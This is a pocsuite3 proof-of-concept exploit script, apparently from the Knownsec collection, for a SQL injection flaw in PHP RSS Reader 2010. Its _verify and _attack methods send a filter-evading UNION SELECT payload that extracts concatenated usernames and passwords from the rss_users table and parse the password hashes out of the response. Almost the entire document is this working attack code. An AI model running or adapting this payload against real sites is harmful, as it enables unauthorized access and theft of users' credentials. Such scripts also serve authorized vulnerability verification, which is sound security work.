PHPRSSReader 2010 SQL注入漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ import re from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '0000' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2013-10-28' createDate = '2013-11-15' updateDate = '2013-11-15' references = [''] name = 'PHP RSS Reader 2010 SQL Injection POC' appPowerLink = 'http://www.phprssreader.com/' appName = 'PHP RSS Reader' appVersion = '2010#' vulType = 'SQL Injection' desc = ''' phpweb has a SQL Injection vul, Attacker can get user's password easily ''' samples = [] install_requires = [''] def _verify(self): result = {} payload = "/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+" content = requests.get(self.url + payload).text reg = re.compile("<h1><strong>(?:.*?){1,10}(\w{32})<\/strong> Latest News<\/h1>") res = reg.findall(content) if res: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = res[0] return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)